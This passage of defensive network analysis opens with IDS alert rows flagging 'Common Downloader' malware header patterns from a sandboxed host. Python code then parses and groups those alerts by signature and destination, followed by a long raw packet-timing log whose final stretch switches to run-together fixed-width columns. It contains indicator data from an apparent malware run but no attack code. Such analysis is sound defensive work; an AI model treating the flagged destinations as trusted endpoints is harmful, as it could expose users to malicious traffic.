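2024-10-22T16:11:53.877008+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49987 | 142.250.184.238 | 443 | TCP
2024-10-22T16:11:53.895201+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49986 | 142.250.184.238 | 443 | TCP
2024-10-22T16:12:01.180935+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.537983+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:04.725700+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49990 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:05.444916+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49993 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:06.084842+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.475477+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49995 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:06.804302+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49996 | 188.114.97.3 | 443 | TCP
2024-10-22T16:12:07.709864+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49998 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:08.100608+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49999 | 193.122.6.168 | 80 | TCP
2024-10-22T16:12:17.408699+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 50021 | 188.114.97.3 | 443 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def parse_alerts(text: str) -> list[Alert]:
    """Parse pipe-delimited alert rows. A row with the wrong column count raises
    instead of being skipped, so a truncated export does not go unnoticed."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = [c.strip() for c in line.split("|")]
        if len(f) != 9:
            raise ValueError(f"expected 9 columns, got {len(f)}: {line!r}")
        alerts.append(Alert(
            # strptime's %z accepts the report's "+0200" offset on every Python 3 version
            ts=datetime.strptime(f[0], "%Y-%m-%dT%H:%M:%S.%f%z"),
            sid=int(f[1]), signature=f[2], severity=int(f[3]),
            src_ip=f[4], src_port=int(f[5]),
            dst_ip=f[6], dst_port=int(f[7]), proto=f[8],
        ))
    return alerts


@dataclass
class DestinationSummary:
    sid: int
    signature: str
    dst: str           # "ip:port"
    alerts: int        # rows that fired for this (SID, destination)
    sessions: int      # distinct client source ports, i.e. distinct TCP connections
    first_seen: datetime
    last_seen: datetime

    @property
    def window_seconds(self) -> float:
        return (self.last_seen - self.first_seen).total_seconds()


def summarise(alerts: list[Alert]) -> list[DestinationSummary]:
    """Collapse alerts by (SID, signature, destination), ordered by first sighting."""
    groups: dict[tuple, list[Alert]] = defaultdict(list)
    for a in alerts:
        groups[(a.sid, a.signature, f"{a.dst_ip}:{a.dst_port}")].append(a)
    out = []
    for (sid, sig, dst), rows in groups.items():
        out.append(DestinationSummary(
            sid=sid, signature=sig, dst=dst, alerts=len(rows),
            sessions=len({r.src_port for r in rows}),
            first_seen=min(r.ts for r in rows),
            last_seen=max(r.ts for r in rows),
        ))
    return sorted(out, key=lambda s: s.first_seen)


def ioc_destinations(alerts: list[Alert]) -> list[str]:
    """Distinct destination ip:port pairs that triggered an alert."""
    return sorted({f"{a.dst_ip}:{a.dst_port}" for a in alerts})


if __name__ == "__main__":
    parsed = parse_alerts(ALERT_ROWS)
    for s in summarise(parsed):
        print(f"SID {s.sid} -> {s.dst:<20} alerts={s.alerts} sessions={s.sessions} "
              f"window={s.window_seconds:.1f}s  {s.signature}")
    print("destinations:", ioc_destinations(parsed))
```

The session count is the useful number here: SID 2803274 fires seven times against 193.122.6.168:80 but over only five client ports, so two of the connections produced the same header pattern twice, while the three alerts for 2803305 are three separate TLS sessions to 188.114.97.3:443 spread over roughly twelve seconds. Collapsing to distinct source ports also keeps a retry loop from inflating the alert count when you compare runs.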
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 16:11:52.572396040 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.572513103 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:52.572616100 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.573498964 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.573538065 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:52.573597908 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.591417074 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.591449022 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:52.591792107 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:52.591861010 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.447166920 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.447242975 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.447985888 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.448044062 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.452596903 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.452713013 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.455280066 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.455353975 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.513076067 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.513098955 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.513458967 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.513525009 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.516206980 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.531852007 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.531883955 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.532166958 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.532804966 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.534248114 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.563323021 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.579336882 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.876921892 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.877141953 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.877516031 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.877552986 CEST | 443 | 49987 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.877641916 CEST | 49987 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.895231962 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.895385027 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.895416021 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.895493984 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.895668030 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.895762920 CEST | 443 | 49986 | 142.250.184.238 | 192.168.2.6
Oct 22, 2024 16:11:53.895848989 CEST | 49986 | 443 | 192.168.2.6 | 142.250.184.238
Oct 22, 2024 16:11:53.916913033 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.916944981 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:53.917180061 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.917387962 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.917401075 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:53.942748070 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.942790031 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:53.942945004 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.943155050 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:53.943171024 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.775599003 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.776058912 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.779638052 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.779649973 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.779968023 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.780073881 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.780446053 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.793473005 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.793806076 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.797177076 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.797194004 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.797460079 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.797600031 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.798043013 CEST | 49989 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:54.823369980 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:54.839337111 CEST | 443 | 49989 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.237399101 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.237477064 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.245671988 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.245734930 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.357106924 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.357184887 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.357208014 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.357249975 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.357258081 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.357300043 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.357840061 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.357888937 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.357949018 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.357990026 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.361977100 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.362024069 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.362283945 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.362332106 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.370964050 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.371017933 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.371045113 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.371082067 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472426891 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472501040 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472524881 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472573042 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472574949 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472587109 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472619057 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472659111 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472739935 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472831011 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472837925 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472884893 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.472893000 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.472944975 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.477613926 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.477730036 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.477744102 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.477945089 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.486049891 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.486104965 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.486119032 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.486166954 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.486277103 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.486325979 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.587641001 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.587730885 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.587769032 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.587773085 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.587769032 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.587790966 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.587830067 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.588252068 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.588295937 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.588376999 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.588416100 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.592962980 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.593414068 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
Oct 22, 2024 16:11:57.593426943 CEST | 443 | 49988 | 142.250.185.65 | 192.168.2.6
Oct 22, 2024 16:11:57.593472958 CEST | 49988 | 443 | 192.168.2.6 | 142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.603127003 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.603182077 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.603193045 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.603231907 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.645653009 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.645721912 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.702960014 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703042030 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703048944 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703063011 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703098059 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703118086 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703125954 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703165054 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.703217030 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.703257084 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704077005 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704139948 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704148054 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704159021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.704179049 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.704206944 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.708273888 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.708327055 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.708338022 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.708384991 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.717863083 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.717928886 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.717943907 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.717983961 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.761143923 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.761215925 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.761241913 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.761409998 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818126917 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818188906 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818206072 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818249941 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818255901 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818293095 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818588018 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818634033 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.818711996 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.818758011 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.823781013 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.823837996 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.823848963 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.823892117 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.833172083 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.833244085 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.833256960 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.833295107 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877101898 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877186060 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877207994 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877250910 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.877258062 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.877311945 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933468103 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933546066 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933553934 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933578014 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933592081 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933617115 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933624029 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933633089 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933670998 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.933682919 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.933722019 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939037085 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939091921 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939096928 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939208984 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939213037 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939304113 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.939306974 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.939395905 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.960266113 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.960330963 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.960338116 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.960381031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.991945028 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992017031 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.992039919 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992108107 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:57.992115021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:57.992165089 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.048902988 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.048974037 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.048985958 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.049000978 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.049036980 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.049063921 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.050242901 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.050318003 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054582119 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054641008 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054646015 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054656029 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054688931 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054718018 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.054727077 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.054774046 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.065599918 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.065669060 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.065674067 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.065716028 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.107578039 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.107650995 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.107661009 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.107705116 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164201021 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164280891 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164319992 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164359093 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164376974 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164386988 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164532900 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.164537907 CEST44349988142.250.185.65192.168.2.6
                                                                                                                          Oct 22, 2024 16:11:58.164578915 CEST49988443192.168.2.6142.250.185.65
                                                                                                                          Oct 22, 2024 16:11:58.170006990 CEST44349988142.250.185.65192.168.2.6
